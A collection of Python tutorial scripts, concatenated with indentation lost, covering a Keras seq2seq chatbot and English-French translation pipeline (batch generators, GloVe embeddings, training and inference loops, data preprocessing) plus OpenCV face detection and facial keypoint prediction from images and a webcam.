del self.y
def shuffle_data(self, train=True):
"""Shuffles X and y together
:param train (bool): whether to shuffle training data, default is True
Note that when train is False, testing data is shuffled instead."""
state = np.random.get_state()
if train:
np.random.shuffle(self.X_train)
np.random.set_state(state)
np.random.shuffle(self.y_train)
else:
np.random.shuffle(self.X_test)
np.random.set_state(state)
np.random.shuffle(self.y_test)
def next_train(self):
"""Training set generator"""
return self.generate_batches(self.X_train, self.y_train, train=True)
def next_validation(self):
"""Validation set generator"""
return self.generate_batches(self.X_test, self.y_test, train=False)
def generate_batches(self, X, y, train=True):
"""Data generator"""
same_tokenizer = self.same_tokenizer
batch_size = self.batch_size
char_level = self.char_level
source_sequence_length = self.source_sequence_length
target_sequence_length = self.target_sequence_length
if same_tokenizer:
num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
num_decoder_tokens = num_encoder_tokens
else:
num_encoder_tokens = self.num_encoder_tokens
num_decoder_tokens = self.num_decoder_tokens
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# update batch size ( different size in last batch of the dataset )
batch_size = encoder_input_data.shape[0]
if self.char_level:
encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
else:
encoder_data = encoder_input_data
decoder_data = decoder_input_data
decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
if char_level:
# if it's char level, one-hot encode all sequences of characters
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
decoder_data[i, t, word_index] = 1
for i, sequence in enumerate(encoder_input_data):
for t, word_index in enumerate(sequence):
encoder_data[i, t, word_index] = 1
else:
# if it's word level, one-hot encode only target_data (the one compared with the dense output)
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
yield ([encoder_data, decoder_data], decoder_target_data)
# shuffle data when an epoch is finished
self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
embedding_index = {}
with open("data/glove.6B.300d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
embedding_matrix = np.zeros((len(word_index)+1, 300))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
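# A hedged usage sketch (assumes the GloVe file above and a fitted tokenizer):
# embedding_matrix = get_embedding_vectors(tokenizer)
# embedding_matrix.shape -> (len(tokenizer.word_index) + 1, 300); row i holds
# the GloVe vector of the word with index i, or zeros for out-of-vocab words,
# which is the shape Embedding(..., weights=[embedding_matrix]) expects.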
def load_data(filename):
text = []
append = text.append
with open(filename) as f:
for line in tqdm.tqdm(f, f"Reading {filename}"):
line = line.strip()
append(line)
return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
# ENCODER
# define an input sequence and process it
if embedding_layer:
encoder_inputs = Input(shape=(None,))
if embedding_matrix is None:
encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
else:
encoder_emb_layer = Embedding(num_encoder_tokens,
latent_dim,
mask_zero=True,
weights=[embedding_matrix],
trainable=False)
encoder_emb = encoder_emb_layer(encoder_inputs)
else:
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder_emb = encoder_inputs
encoder_lstm = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
# we discard encoder_outputs and only keep the states
encoder_states = [state_h, state_c]
# DECODER
# Set up the decoder, using encoder_states as initial state
if embedding_layer:
decoder_inputs = Input(shape=(None,))
else:
decoder_inputs = Input(shape=(None, num_encoder_tokens))
# add an embedding layer
# decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
if embedding_layer:
decoder_emb = encoder_emb_layer(decoder_inputs)
else:
decoder_emb = decoder_inputs
# we set up our decoder to return full output sequences
# and to return internal states as well, we don't use the
# return states in the training model, but we will use them in inference
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _ = decoder_lstm(decoder_emb, initial_state=encoder_states)
# dense output layer used to predict each character ( or word )
# in one-hot manner, not recursively
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# finally, the model is defined with inputs for the encoder and the decoder
# and the output target sequence
# turn encoder_input_data & decoder_input_data into decoder_target_data
model = Model([encoder_inputs, decoder_inputs], outputs=decoder_outputs)
# model.summary()
# define encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# define decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
# Get the embeddings of the decoder sequence
if embedding_layer:
dec_emb2 = encoder_emb_layer(decoder_inputs)
else:
dec_emb2 = decoder_inputs
decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
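# A hedged shape sketch with toy sizes (illustration only):
# model, enc, dec = encoder_decoder_model(num_encoder_tokens=50, latent_dim=32,
#                                         num_decoder_tokens=50)
# enc maps a source sequence to [state_h, state_c], each of shape (batch, 32);
# dec then consumes one target token at a time plus those two states, which is
# exactly the contract predict_sequence and decode_sequence below rely on.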
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
if char_level:
target_seq = np.zeros((1, 1, cardinality))
else:
target_seq = np.zeros((1, 1))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
if char_level:
sampled_token_index = to_categorical(np.argmax(y), num_classes=cardinality)
else:
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
if char_level:
target_seq = np.zeros((1, 1, cardinality))
else:
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
return np.array(output)
def decode_sequence(enc, dec, input_seq):
# Encode the input as state vectors.
states_value = enc.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1,1))
# Populate the first character of target sequence with the start character.
target_seq[0, 0] = 0
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = dec.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
# sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sequence.append(output_tokens[0, -1, :])
# Exit condition: either hit max length or sample the stop (padding) token;
# index 0 is the padding index produced by Keras pad_sequences here
if sampled_token_index == 0 or len(decoded_sequence) > 50:
    stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
# Update states
states_value = [h, c]
return decoded_sequence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""Pad x
:param x: list of sequences
:param length: Length to pad the sequence to, If None, use length
of longest sequence in x.
:return: Padded numpy array of sequences"""
return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
"""Preprocess x and y
:param x: Feature list of sentences
:param y: Label list of sentences
:return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x2 = [ [0] + s for s in preprocess_y ]
longest_x = max([len(i) for i in preprocess_x])
longest_y = max([len(i) for i in preprocess_y]) + 1
# max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
max_length = longest_x if longest_x > longest_y else longest_y
preprocess_x = pad(preprocess_x, length=max_length)
preprocess_x2 = pad(preprocess_x2, length=max_length)
preprocess_y = pad(preprocess_y, length=max_length)
# preprocess_x = to_categorical(preprocess_x)
# preprocess_x2 = to_categorical(preprocess_x2)
preprocess_y = to_categorical(preprocess_y)
return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
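# A hedged usage sketch with made-up toy sentences (illustration only):
# px, px2, py, xtk, ytk = preprocess(["new jersey is sometimes quiet"],
#                                    ["new jersey est parfois calme"])
# px.shape  -> (1, max_length)            padded source sequences
# px2.shape -> (1, max_length)            targets shifted right by a leading 0
# py.shape  -> (1, max_length, n_tokens)  one-hot targets for the dense output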
def load_data(filename):
with open(filename) as f:
text = f.read()
return text.split("\n")
def load_dataset():
english_sentences = load_data("data/small_vocab_en")
french_sentences = load_data("data/small_vocab_fr")
return preprocess(english_sentences, french_sentences)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
from generator import NMTGenerator
gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
gen.load_dataset()
print(gen.num_decoder_tokens)
print(gen.num_encoder_tokens)
print(gen.source_sequence_length)
print(gen.target_sequence_length)
# split_data() frees gen.X / gen.y, so inspect the train split instead
print(gen.X_train.shape)
print(gen.y_train.shape)
for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.next_train()):
# print("encoder_input_data.shape:", encoder_input_data.shape)
# print("decoder_output_data.shape:", decoder_input_data.shape)
if i % (len(gen.X_train) // gen.batch_size + 1) == 0:
print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
return ' '.join([index_to_words[prediction] for prediction in logits])
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = pad(tokenized, length=37)
sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
# print(sequence)
result = logits_to_text(sequence)
print(result)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
# return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
# return ''.join([index_to_words[np.where(prediction==1)[0]] for prediction in logits])
text = ""
for prediction in logits:
char_index = np.where(prediction)[0][0]
char = index_to_words[char_index]
text += char
return text
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
text = input("> ")
tokenized = tokenize([text], tokenizer=y_tk)[0]
# print("tokenized:", tokenized)
X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
# print(X)
sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
# print(sequence)
result = logits_to_text(sequence)
print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=32,
same_tokenizer=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
callbacks=[checkpointer],
epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
text_gen = NMTGenerator(source_file="data/questions",
target_file="data/answers",
batch_size=256,
same_tokenizer=True,
char_level=True,
verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
validation_data=text_gen.next_validation(),
verbose=1,
steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
callbacks=[checkpointer],
epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
if "europarl-v7" in line:
continue
# X.append(line)
# if i == 2007723 or i == 2007724 or i == 2007725
if i <= 2007722:
X.append(line.strip())
else:
y.append(line.strip())
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
for i in tqdm.tqdm(X, "Writing english"):
print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
for i in tqdm.tqdm(y, "Writing french"):
print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
p = inflect.engine()
X, y = [], []
special_words = {
"haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
"muslims", "muslim", "islam", "?", ".", ",",
'_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
'_func_val_get_number_plus_para1__num1__para2__num2_',
'_func_val_update_call_me_enforced_para1__callme_',
'_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
'_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
'_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
'_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
'_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
'_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
'_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
'_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
'_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
'_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
'_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
'_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
english_words = { word.strip() for word in open("data/words8.txt") }
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
values = line.split()
word = values[0]
embedding_words.add(word)
maps = open("data/maps.txt").readlines()
word_mapper = {}
for mapping in maps:  # avoid shadowing the built-in map()
    key, value = mapping.split("=>")
key = key.strip()
value = value.strip()
print(f"Mapping {key} to {value}")
word_mapper[key.lower()] = value
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
global unks
global digits
global mapped
global english
global special
result = []
append = result.append
words = line.split()
for word in words:
word = word.lower()
if word.isdigit():
append(p.number_to_words(word))
digits += 1
continue
if word in word_mapper:
append(word_mapper[word])
mapped += 1
continue
if word in english_words:
append(word)
english += 1
continue
if word in special_words:
append(word)
special += 1
continue
append("_unk_")
unks += 1
return ' '.join(result)
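# Resolution order per word, as implemented above: digits are spelled out with
# inflect, then maps.txt overrides apply, then known English words and the
# special tokens pass through unchanged, and everything else becomes "_unk_".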
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
with open(file, encoding='utf8') as f:
for line in f:
line = line.strip()
if "Q: " in line:
X.append(line)
elif "A: " in line:
y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
for line in tqdm.tqdm(X, "Writing questions"):
# str.lstrip('Q: ') strips any leading 'Q', ':' or ' ' characters,
# so remove the exact "Q:" prefix instead
line = line.strip()
if line.startswith("Q:"):
    line = line[2:].strip()
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
for line in tqdm.tqdm(y, "Writing answers"):
line = line.strip()
if line.startswith("A:"):
    line = line[2:].strip()
line = map_text(line)
print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_fontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
return keypoints * 50 + 100
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
for (x, y, w, h) in faces:
cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
face_image = image.copy()[y: y+h, x: x+w]
face_image = normalize_image(face_image)
keypoints = get_single_prediction(model, face_image)
show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
image = np.expand_dims(image, axis=0)
keypoints = model.predict(image)[0]
return keypoints.reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
for keypoint in predicted_keypoints:
    image = cv2.circle(image, (int(keypoint[0]), int(keypoint[1])), 2, color=(255, 0, 255))
if true_keypoints is not None:
    for keypoint in true_keypoints:
        image = cv2.circle(image, (int(keypoint[0]), int(keypoint[1])), 2, color=(0, 255, 0))
return image
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# make a copy of the original image
image = frame.copy()
image = normalize_image(image)
keypoints = get_single_prediction(model, image)
print(keypoints[0])
keypoints = untransform(keypoints)
# w, h = frame.shape[:2]
